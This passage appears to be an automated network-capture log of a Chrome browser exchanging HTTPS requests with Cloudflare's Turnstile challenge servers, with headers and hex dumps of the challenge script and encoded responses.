                                                                                                                  2024-12-19 10:43:00 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 6c 5e 6d 7d 2c 27 6f 6c 59 53 52 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 5e 6c 7d 2c 27 54 4c 56 4b 77 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 5e 6c 7d 2c 27 64 6c 77 4a 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 2a 6c 7d 2c 27 78 69 6c 53 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 5e 6c 7d 2c 27 63 76 75 74 68 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 66 5b 69 38 28 31 36 36 39 29 5d 28 65 4d 5b 69 38 28 31 35 37 32 29 5d 5b 69 38 28 31 37 31 31 29 5d 2c 27 5f 27 29 2b 30 2c 6a 3d 6a 5b 69 38 28 35 35 39 29 5d 28 2f 2e 2f 67 2c 66
                                                                                                                  Data Ascii: ){return l^m},'olYSR':function(l,m){return m^l},'TLVKw':function(l,m){return m^l},'dlwJj':function(l,m){return m*l},'xilSJ':function(l,m){return m^l},'cvuth':function(l,m){return l+m}},k,h=32,j=f[i8(1669)](eM[i8(1572)][i8(1711)],'_')+0,j=j[i8(559)](/./g,f


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.1649732104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:01 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 3215
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:01 UTC3215OUTData Raw: 76 5f 38 66 34 36 63 39 65 65 35 64 64 65 63 33 34 32 3d 48 25 32 62 62 73 42 73 67 73 76 73 32 73 75 73 57 64 6b 36 64 6b 50 72 58 50 58 68 59 24 58 59 6b 58 72 30 68 56 58 76 30 6b 49 64 6b 30 56 52 6b 6e 34 73 56 35 44 50 34 35 42 6f 2b 58 70 6b 31 72 67 56 6b 6d 67 73 6b 4e 45 6b 59 78 53 6b 24 4c 72 6b 68 62 6f 73 49 34 6b 53 73 67 42 4c 6b 75 64 35 67 6b 6e 6b 59 52 6b 76 4e 31 63 49 6e 66 6b 58 66 71 6f 6b 75 2d 34 35 41 55 45 68 73 32 24 66 78 4a 72 63 34 66 38 33 64 44 35 58 53 6b 31 2b 6b 30 73 6e 24 69 4c 32 42 31 73 58 43 34 69 57 68 79 73 64 51 72 6d 62 6b 54 4d 4b 64 45 44 59 34 6b 30 50 30 43 6f 64 73 57 73 6b 51 67 6d 65 53 4b 6b 73 6b 69 73 58 67 50 42 49 45 72 73 58 6f 58 67 43 4e 6b 48 78 31 6b 67 52 72 55 7a 59 67 76 35 4b 73 6b 31 6f
                                                                                                                  Data Ascii: v_8f46c9ee5ddec342=H%2bbsBsgsvs2susWdk6dkPrXPXhY$XYkXr0hVXv0kIdk0VRkn4sV5DP45Bo+Xpk1rgVkmgskNEkYxSk$LrkhbosI4kSsgBLkud5gknkYRkvN1cInfkXfqoku-45AUEhs2$fxJrc4f83dD5XSk1+k0sn$iL2B1sXC4iWhysdQrmbkTMKdEDY4k0P0CodsWskQgmeSKkskisXgPBIErsXoXgCNkHx1kgRrUzYgv5Ksk1o
                                                                                                                  2024-12-19 10:43:01 UTC747INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:01 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 149696
                                                                                                                  Connection: close
                                                                                                                  cf-chl-gen: hobVdJWbBk2p9i9zDM8kbwiRUGx28JkbDChqtrXWufm/sLJ1bVYA3oZBqNwlhC6TwqLmF3YEDdeHK3fGlh7w4ONMX5BXVtOGVo7HzpOwXnc7AkEyLth1JGHfjp3AhFDV8gOvw/is8ZSKN2D/mpvWghl/Fpptp6SoYPbilXNBFFnjQvs0Q9si9FWYwjO3y9dYn5u2s6xg4TPb20gSxFaOgKfkSflTdERJiqAz4ZA2pFlLZotAq31tbXHwDyiH68nxmapKOpOf8rws1HTEYH2hNqQioMXajtr/8ZwzDyMk+/EJKcxOolzGjQiHtMLLsbq6JCOAxw1JD/rEBL9Z/KZJAtU2ANeV3auh/xTET6qaaDT33Y7H8Z8LCfIcoAvB3S4mzTQvl3+qRYZjk+IZTAvBtys3jHzsJFt663LJdCoI+OYZA+nfPi9gutc51b6zdszCP4JV9wvJw7zI1JTl8AzHHn/ShlO9dxQdNeY3+z6IODpafes=$kWzqaTRByScUOy6O
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca0d1b7b43b3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:43:01 UTC622INData Raw: 77 37 75 56 79 62 57 63 76 59 32 37 73 5a 32 4f 31 49 2f 58 77 35 61 78 31 4b 6d 6b 70 62 33 61 79 37 57 7a 6d 71 44 56 34 4c 57 31 36 4e 65 70 36 4b 66 75 37 74 2f 47 33 4e 44 43 7a 2f 54 43 39 2b 2f 34 30 39 33 55 37 76 79 35 73 2f 50 66 37 64 6d 34 2b 51 51 49 78 65 44 59 2f 51 67 4a 43 74 33 4e 42 75 6a 53 46 78 41 4b 41 67 76 77 46 65 2f 30 47 68 51 69 49 67 37 31 38 50 50 6e 48 51 73 4d 36 79 45 50 43 51 67 65 45 75 73 75 4c 51 41 32 49 51 6f 46 4a 77 34 6d 4a 68 6b 52 4b 51 78 43 4c 42 59 52 4a 53 6b 36 4b 67 68 44 50 69 38 5a 4c 79 74 4c 54 41 34 48 4b 43 56 54 4c 6b 77 34 4d 44 70 55 48 7a 67 73 54 6c 59 75 54 79 56 58 52 6a 31 46 61 53 68 41 58 69 34 76 55 6a 31 68 4c 6b 78 67 51 48 64 6a 54 45 68 31 61 56 46 62 54 58 64 56 64 45 4a 52 67 6d 64
                                                                                                                  Data Ascii: w7uVybWcvY27sZ2O1I/Xw5ax1Kmkpb3ay7WzmqDV4LW16Nep6Kfu7t/G3NDCz/TC9+/4093U7vy5s/Pf7dm4+QQIxeDY/QgJCt3NBujSFxAKAgvwFe/0GhQiIg718PPnHQsM6yEPCQgeEusuLQA2IQoFJw4mJhkRKQxCLBYRJSk6KghDPi8ZLytLTA4HKCVTLkw4MDpUHzgsTlYuTyVXRj1FaShAXi4vUj1hLkxgQHdjTEh1aVFbTXdVdEJRgmd
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 31 37 69 6e 4a 33 61 56 6d 43 66 71 4f 52 66 58 68 36 63 33 4f 70 61 6f 43 63 5a 34 46 37 73 37 46 77 6f 34 71 55 68 4a 6d 51 74 49 74 39 6c 59 43 39 71 70 47 36 74 33 2b 58 6b 71 53 5a 76 6f 71 67 6c 35 65 43 6d 72 79 2f 77 35 4b 6a 73 4b 6d 6a 72 4d 4f 30 6a 37 58 4b 76 4e 47 32 74 4c 2f 6b 34 63 48 46 31 63 4f 36 6f 73 72 4a 72 4c 72 6d 32 72 4c 78 79 4d 4c 42 72 2b 79 36 32 61 37 50 30 2b 75 35 37 65 72 52 7a 4e 41 44 75 65 44 35 2f 50 6e 37 79 51 67 43 34 75 45 43 79 73 7a 78 7a 2b 62 4b 32 42 48 6e 37 42 7a 33 2b 2f 51 4e 2b 78 77 5a 41 53 63 4a 2b 2f 6f 4b 47 51 76 2b 36 41 38 52 41 2b 77 54 43 51 66 77 46 78 45 4c 39 42 73 4a 44 2f 67 66 45 52 50 38 49 67 51 58 41 53 59 45 47 77 55 73 52 78 38 4a 4d 45 38 6a 44 54 52 48 4a 78 45 34 55 6b 51 52 4f
                                                                                                                  Data Ascii: 17inJ3aVmCfqORfXh6c3OpaoCcZ4F7s7Fwo4qUhJmQtIt9lYC9qpG6t3+XkqSZvoqgl5eCmry/w5KjsKmjrMO0j7XKvNG2tL/k4cHF1cO6osrJrLrm2rLxyMLBr+y62a7P0+u57erRzNADueD5/Pn7yQgC4uECyszxz+bK2BHn7Bz3+/QN+xwZAScJ+/oKGQv+6A8RA+wTCQfwFxEL9BsJD/gfERP8IgQXASYEGwUsRx8JME8jDTRHJxE4UkQRO
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 50 66 35 4a 63 64 58 6c 69 71 5a 61 58 6e 71 36 51 71 70 79 4c 6a 4a 79 6b 67 5a 4b 30 64 5a 47 56 76 4c 53 4e 6d 37 57 53 6f 5a 75 37 72 33 79 6d 67 36 43 61 70 38 6d 71 6c 72 36 66 7a 4d 54 43 6e 73 43 68 31 4c 62 61 73 62 6e 58 76 4a 76 59 6e 35 66 63 6f 39 48 69 31 62 6e 56 77 4d 66 48 32 4d 53 38 74 39 72 49 35 74 50 65 7a 4f 72 74 34 74 44 75 72 65 72 31 39 62 7a 6f 33 64 2f 4e 2f 4f 62 39 39 39 6f 49 30 76 7a 65 35 4d 66 61 38 41 4c 4d 45 41 34 4e 47 41 76 69 46 38 77 45 35 42 7a 70 36 2b 44 67 47 51 55 4e 45 67 44 7a 42 77 6f 58 39 68 37 6c 4d 4f 6b 6d 4b 51 49 64 38 76 34 30 49 67 4d 51 47 67 59 46 39 53 2f 36 49 76 67 6a 4a 41 34 51 4a 78 73 70 53 77 6f 61 47 67 63 2f 43 6b 6b 62 51 44 52 52 52 55 5a 4e 46 69 31 4b 4f 31 31 48 55 6c 67 38 48 56
                                                                                                                  Data Ascii: Pf5JcdXliqZaXnq6QqpyLjJykgZK0dZGVvLSNm7WSoZu7r3ymg6Cap8mqlr6fzMTCnsCh1LbasbnXvJvYn5fco9Hi1bnVwMfH2MS8t9rI5tPezOrt4tDurer19bzo3d/N/Ob999oI0vze5Mfa8ALMEA4NGAviF8wE5Bzp6+DgGQUNEgDzBwoX9h7lMOkmKQId8v40IgMQGgYF9S/6IvgjJA4QJxspSwoaGgc/CkkbQDRRRUZNFi1KO11HUlg8HV
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 6d 71 61 74 62 5a 75 64 62 36 43 4d 63 35 42 2f 67 71 4e 78 6b 36 57 30 69 59 65 6d 6e 4c 32 30 77 48 71 77 67 73 66 47 65 71 53 31 69 49 79 5a 72 34 61 47 72 74 47 6c 30 71 6e 54 74 4e 65 54 78 71 33 50 6e 64 66 62 7a 74 62 65 6d 74 2f 42 32 4e 58 65 32 63 69 7a 75 39 6a 73 36 72 76 71 36 2b 2f 69 31 63 37 73 2b 4e 6e 73 74 62 4c 51 38 65 65 36 7a 74 50 7a 41 4c 36 39 2b 4f 4c 6a 35 67 76 73 35 64 72 73 41 2b 48 71 34 64 41 55 44 66 66 30 43 4d 7a 75 2f 42 63 48 45 66 6e 59 39 42 6a 77 42 76 37 68 39 76 77 64 2b 79 67 49 39 69 30 76 44 77 41 4c 36 67 6b 71 4a 43 63 79 39 7a 30 34 4c 2f 77 7a 49 50 6e 36 50 30 45 58 46 42 67 70 52 41 73 48 49 52 38 74 53 77 73 66 53 56 51 68 4b 79 34 72 53 78 6f 74 4e 31 30 65 4e 78 38 54 55 57 4a 57 51 6b 4d 6c 4a 54 68
                                                                                                                  Data Ascii: mqatbZudb6CMc5B/gqNxk6W0iYemnL20wHqwgsfGeqS1iIyZr4aGrtGl0qnTtNeTxq3Pndfbztbemt/B2NXe2cizu9js6rvq6+/i1c7s+NnstbLQ8ee6ztPzAL69+OLj5gvs5drsA+Hq4dAUDff0CMzu/BcHEfnY9BjwBv7h9vwd+ygI9i0vDwAL6gkqJCcy9z04L/wzIPn6P0EXFBgpRAsHIR8tSwsfSVQhKy4rSxotN10eNx8TUWJWQkMlJTh
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 47 69 6b 70 6f 69 54 67 6f 43 67 6c 6f 53 48 68 62 6d 6f 6b 59 36 4f 6b 70 71 30 66 70 69 41 76 6f 43 31 6c 63 4f 38 6e 4a 75 6d 70 38 6e 4a 6c 4e 57 30 6e 36 75 59 70 37 53 33 6b 39 36 62 76 39 65 30 33 39 36 6a 78 70 6d 6b 78 71 72 57 31 63 58 48 79 4d 71 2f 78 63 72 67 77 4d 44 55 38 65 54 35 34 39 44 73 79 64 6f 42 76 64 6e 64 39 73 51 45 34 39 2f 67 41 66 58 74 32 75 76 37 77 67 48 50 44 51 66 56 30 51 66 6a 39 66 44 56 46 78 41 41 44 2f 6e 77 47 39 34 5a 48 42 54 30 46 78 54 71 42 69 6f 66 36 75 77 6f 45 52 7a 7a 43 41 54 73 47 51 6f 54 47 41 66 32 50 67 34 58 49 50 67 53 51 6b 41 6a 42 53 51 6e 50 6b 45 67 50 43 68 4b 49 53 59 74 49 45 4d 64 4e 44 41 6b 52 79 73 73 53 53 38 61 51 46 73 73 58 46 39 61 57 7a 6f 34 56 30 68 6e 4b 43 5a 4d 50 6c 63 74
                                                                                                                  Data Ascii: GikpoiTgoCgloSHhbmokY6Okpq0fpiAvoC1lcO8nJump8nJlNW0n6uYp7S3k96bv9e0396jxpmkxqrW1cXHyMq/xcrgwMDU8eT549DsydoBvdnd9sQE49/gAfXt2uv7wgHPDQfV0Qfj9fDVFxAAD/nwG94ZHBT0FxTqBiof6uwoERzzCATsGQoTGAf2Pg4XIPgSQkAjBSQnPkEgPChKISYtIEMdNDAkRyssSS8aQFssXF9aWzo4V0hnKCZMPlct
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 35 75 6c 72 6c 32 65 35 32 48 76 58 4b 69 73 59 2b 73 6b 72 53 43 6d 70 4b 34 6d 6f 79 4c 75 71 43 4d 79 36 4b 64 73 36 50 41 31 63 37 61 6a 4c 4b 33 6b 35 79 6f 73 4b 75 38 72 37 37 4f 31 36 43 37 32 4f 4b 39 78 2b 6e 47 35 74 6e 64 76 61 58 51 79 39 2f 70 30 62 54 4b 78 73 6a 37 33 75 33 59 32 64 2f 4c 39 66 71 2b 42 41 62 33 36 64 76 61 42 78 44 68 36 77 54 2b 34 51 54 78 38 74 41 4e 42 64 6b 47 46 76 55 56 49 64 2f 66 46 77 33 64 46 76 44 76 39 2f 58 37 47 53 6f 61 47 76 6a 38 4b 67 6e 38 41 68 49 67 4c 53 33 34 4c 44 67 59 45 6a 7a 33 2b 53 77 2f 4e 54 59 6c 45 7a 49 56 42 53 73 65 4e 30 38 74 42 79 73 65 4b 68 31 4f 4d 53 4d 56 46 79 31 4a 4c 45 56 54 4d 31 74 58 49 6c 42 4d 52 68 68 41 58 6c 64 43 52 6c 78 72 61 32 45 71 50 30 70 69 51 6a 39 4a 63
                                                                                                                  Data Ascii: 5ulrl2e52HvXKisY+skrSCmpK4moyLuqCMy6Kds6PA1c7ajLK3k5yosKu8r77O16C72OK9x+nG5tndvaXQy9/p0bTKxsj73u3Y2d/L9fq+BAb36dvaBxDh6wT+4QTx8tANBdkGFvUVId/fFw3dFvDv9/X7GSoaGvj8Kgn8AhIgLS34LDgYEjz3+Sw/NTYlEzIVBSseN08tByseKh1OMSMVFy1JLEVTM1tXIlBMRhhAXldCRlxra2EqP0piQj9Jc
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 56 6a 61 43 70 67 4a 65 39 6b 4d 65 45 73 49 47 37 71 38 76 42 71 38 53 6d 71 5a 4c 4e 73 36 6d 50 6e 35 69 77 70 38 65 79 75 71 69 73 73 37 72 51 75 4e 79 78 73 62 37 6d 35 37 33 64 71 4d 71 71 35 75 4c 41 37 4f 37 76 77 2b 37 79 77 73 7a 6a 79 63 6e 75 32 4c 76 49 30 75 76 34 30 66 33 46 35 51 48 36 76 41 58 4b 41 2b 51 43 33 38 7a 79 7a 2b 4c 6c 42 74 49 50 47 50 55 50 35 74 66 65 33 4f 67 67 37 65 2f 63 4a 52 54 32 46 2b 4d 55 35 69 77 74 4d 42 72 6d 4c 50 45 53 4d 6a 50 31 4a 51 77 53 47 41 38 36 2b 7a 59 4f 4e 44 67 5a 49 78 6b 56 48 69 64 44 43 53 49 68 48 53 70 41 47 55 4d 6c 50 6a 56 56 4e 54 41 68 55 55 68 57 4b 54 63 37 4b 43 70 50 57 42 55 38 48 44 30 78 50 46 64 54 4e 6a 56 49 53 55 6c 6f 52 46 4a 68 4b 7a 46 71 55 6e 6c 4c 57 6e 6c 78 65 56
                                                                                                                  Data Ascii: VjaCpgJe9kMeEsIG7q8vBq8SmqZLNs6mPn5iwp8eyuqiss7rQuNyxsb7m573dqMqq5uLA7O7vw+7ywszjycnu2LvI0uv40f3F5QH6vAXKA+QC38zyz+LlBtIPGPUP5tfe3Ogg7e/cJRT2F+MU5iwtMBrmLPESMjP1JQwSGA86+zYONDgZIxkVHidDCSIhHSpAGUMlPjVVNTAhUUhWKTc7KCpPWBU8HD0xPFdTNjVISUloRFJhKzFqUnlLWnlxeV
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 6c 36 57 65 67 48 75 56 79 35 6d 67 68 71 65 67 71 70 43 30 70 37 62 41 72 63 50 51 7a 4b 2f 49 75 62 47 6f 31 4b 2f 54 30 36 48 50 74 2b 4c 61 71 62 58 46 76 4f 79 6c 7a 61 72 65 30 4e 4b 75 79 39 37 59 73 73 7a 55 32 4c 50 52 37 75 71 35 30 73 7a 75 76 64 66 41 33 73 43 37 31 51 7a 5a 34 4d 62 6e 34 4f 72 51 39 4f 66 48 31 76 45 46 39 4f 7a 32 47 64 30 4f 43 77 49 52 46 41 30 66 34 66 30 43 4b 53 48 35 43 43 4c 2b 44 67 67 6f 48 4f 67 54 37 77 30 48 46 44 59 58 41 79 73 4d 4f 54 45 33 41 66 63 43 44 54 42 44 44 79 49 32 49 53 73 2b 4f 53 55 66 54 6a 73 70 53 69 51 2f 4c 55 6f 34 51 7a 46 50 4c 45 63 31 55 30 42 4c 4f 56 64 61 54 7a 31 62 49 31 4e 42 59 44 78 47 50 46 38 72 52 31 35 50 64 44 31 4d 62 54 64 5a 65 47 31 64 52 30 67 37 56 6c 39 65 67 30 35
                                                                                                                  Data Ascii: l6WegHuVy5mghqegqpC0p7bArcPQzK/IubGo1K/T06HPt+LaqbXFvOylzare0NKuy97YsszU2LPR7uq50szuvdfA3sC71QzZ4Mbn4OrQ9OfH1vEF9Oz2Gd0OCwIRFA0f4f0CKSH5CCL+DggoHOgT7w0HFDYXAysMOTE3AfcCDTBDDyI2ISs+OSUfTjspSiQ/LUo4QzFPLEc1U0BLOVdaTz1bI1NBYDxGPF8rR15PdD1MbTdZeG1dR0g7Vl9eg05
                                                                                                                  2024-12-19 10:43:01 UTC1369INData Raw: 36 65 48 71 5a 72 4a 6f 4d 6a 46 6a 61 36 2b 79 61 37 43 70 4e 71 33 74 62 6a 58 73 38 48 51 31 71 33 61 76 63 54 42 78 4e 79 38 33 72 36 36 36 61 79 2f 36 72 4f 39 74 64 50 72 38 2b 72 61 32 50 50 32 31 39 33 4a 37 75 50 52 41 39 62 77 35 63 67 44 79 65 66 4a 33 64 2f 66 35 64 34 47 41 63 2f 31 47 42 59 54 45 39 72 75 37 52 62 5a 46 78 4c 72 38 2f 6f 46 39 75 58 2b 34 67 58 71 4b 2b 77 65 49 44 45 63 2b 78 49 46 43 67 55 74 38 54 66 32 39 54 54 31 44 76 58 31 4e 78 63 43 51 54 6b 47 4f 44 78 47 4f 45 52 43 54 69 55 61 50 78 41 2b 49 69 63 53 49 69 49 4f 56 45 52 49 52 6a 63 7a 4e 54 6f 59 58 6a 30 76 54 32 4a 42 4e 56 64 6c 51 55 68 58 61 30 52 77 4c 55 4a 67 58 6d 5a 4c 51 6c 5a 50 4f 48 5a 56 4f 55 5a 50 66 7a 2b 42 54 32 42 43 5a 46 4a 65 58 58 71 4a
                                                                                                                  Data Ascii: 6eHqZrJoMjFja6+ya7CpNq3tbjXs8HQ1q3avcTBxNy83r666ay/6rO9tdPr8+ra2PP2193J7uPRA9bw5cgDyefJ3d/f5d4GAc/1GBYTE9ru7RbZFxLr8/oF9uX+4gXqK+weIDEc+xIFCgUt8Tf29TT1DvX1NxcCQTkGODxGOERCTiUaPxA+IicSIiIOVERIRjczNToYXj0vT2JBNVdlQUhXa0RwLUJgXmZLQlZPOHZVOUZPfz+BT2BCZFJeXXqJ


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.1649734104.18.95.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:03 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:03 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:03 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: yZhjf/uy85LLHp1Q4sXic+7xJKoU4ceqe0A=$hnHZXiHHjwDzFU79
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca1c5e807d11-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:43:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.1649735104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:04 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f46c9ee5ddec342/1734604981423/a5a29d9b2856db968f9f890dd33a75bcd59170870ad9f80b9391466e460beb8e/nVUMjn0PcCLbXFv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:05 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:05 GMT
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 1
                                                                                                                  Connection: close
                                                                                                                  2024-12-19 10:43:05 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 70 61 4b 64 6d 79 68 57 32 35 61 50 6e 34 6b 4e 30 7a 70 31 76 4e 57 52 63 49 63 4b 32 66 67 4c 6b 35 46 47 62 6b 59 4c 36 34 34 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gpaKdmyhW25aPn4kN0zp1vNWRcIcK2fgLk5FGbkYL644AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                  2024-12-19 10:43:05 UTC1INData Raw: 4a
                                                                                                                  Data Ascii: J


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.1649736104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:07 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f46c9ee5ddec342/1734604981425/pRF8XJBISw1z0s_ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:07 UTC200INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:07 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca32cea77c78-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
